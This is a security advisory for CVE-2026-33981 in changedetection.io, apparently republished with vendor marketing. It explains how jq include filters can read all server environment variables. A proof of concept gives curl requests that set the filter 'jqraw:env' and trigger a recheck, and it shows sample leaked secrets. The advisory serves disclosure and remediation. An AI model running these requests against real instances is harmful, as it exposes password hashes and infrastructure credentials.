Summary
The jq: and jqraw: include filter expressions allow use of the jq env builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including SALTED_PASS, PLAYWRIGHT_DRIVER_URL, HTTP_PROXY, and any secrets passed as env vars to the container.
Details
Vulnerable file: changedetectionio/html_tools.py, lines 380-388
User-supplied jq filter expressions are compiled and executed without restricting dangerous jq builtins:
if json_filter.startswith("jq:"):
jq_expression = jq.compile(json_filter.removeprefix("jq:"))
match = jq_expression.input(json_data).all()
return _get_stripped_text_from_json_match(match)
if json_filter.startswith("jqraw:"):
jq_expression = jq.compile(json_filter.removeprefix("jqraw:"))
match = jq_expression.input(json_data).all()
return '\n'.join(str(item) for item in match)
The form validator at forms.py:670-673 only checks that the expression compiles (jq.compile(input)), it does not block dangerous functions. The jq env builtin reads all process environment variables regardless of the input data, returning a dictionary of every env var in the server process.
PoC
Step 1, Create a watch for any JSON endpoint with jqraw:env as the include filter:
curl -X POST http://target:5000/api/v1/watch \
-H "Content-Type: application/json" \
-H "x-api-key: <api-key>" \
-d '{
"url": "https://httpbin.org/json",
"include_filters": ["jqraw:env"],
"time_between_check": {"seconds": 30}
}'
If no password or API key is set (the default), no authentication is needed.
Step 2, Wait for the watch to be checked, or trigger a recheck:
curl "http://target:5000/api/v1/watch/<uuid>?recheck=true" -H "x-api-key: <api-key>"
Step 3, The processed text file on disk now contains all environment variables:
{'SALTED_PASS': '...hashed password...', 'PLAYWRIGHT_DRIVER_URL': 'ws://browser:3000',
'HTTP_PROXY': 'socks5h://10.10.1.10:1080', 'SHELL': '/bin/bash',
'HOME': '/root', 'PATH': '...', 'WERKZEUG_SERVER_FD': '22',
... and all other env vars}
The data is visible in the web UI when viewing the watch's latest snapshot, and is also included in notification messages if notifications are configured.
Confirmed on v0.54.6: The processed text file stored 46 environment variables from the server process.
Impact
- Secret exposure: Leaks
SALTED_PASS(password hash used for authentication), enabling offline cracking or direct session forgery - Infrastructure credential theft: Leaks
PLAYWRIGHT_DRIVER_URL,WEBDRIVER_URL,HTTP_PROXY/HTTPS_PROXY, database connection strings, and any API keys or tokens passed as environment variables - Cascading access: Leaked proxy credentials or browser automation URLs can be used to pivot into other internal systems
- Affects all deployments using jq: Any instance where the Python
jqmodule is installed (standard in Docker deployments) is vulnerable - No authentication required by default: changedetection.io ships with no password and the API accessible without a key, so this is exploitable by any user with network access in the default configuration
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-33981? CVE-2026-33981 is a high-severity security vulnerability in changedetection.io (pip), affecting versions <= 0.54.6. It is fixed in 0.54.7.
- Which versions of changedetection.io are affected by CVE-2026-33981? changedetection.io (pip) versions <= 0.54.6 is affected.
- Is there a fix for CVE-2026-33981? Yes. CVE-2026-33981 is fixed in 0.54.7. Upgrade to this version or later.
- Is CVE-2026-33981 exploitable, and should I be worried? Whether CVE-2026-33981 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-33981 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-33981? Upgrade
changedetection.ioto 0.54.7 or later.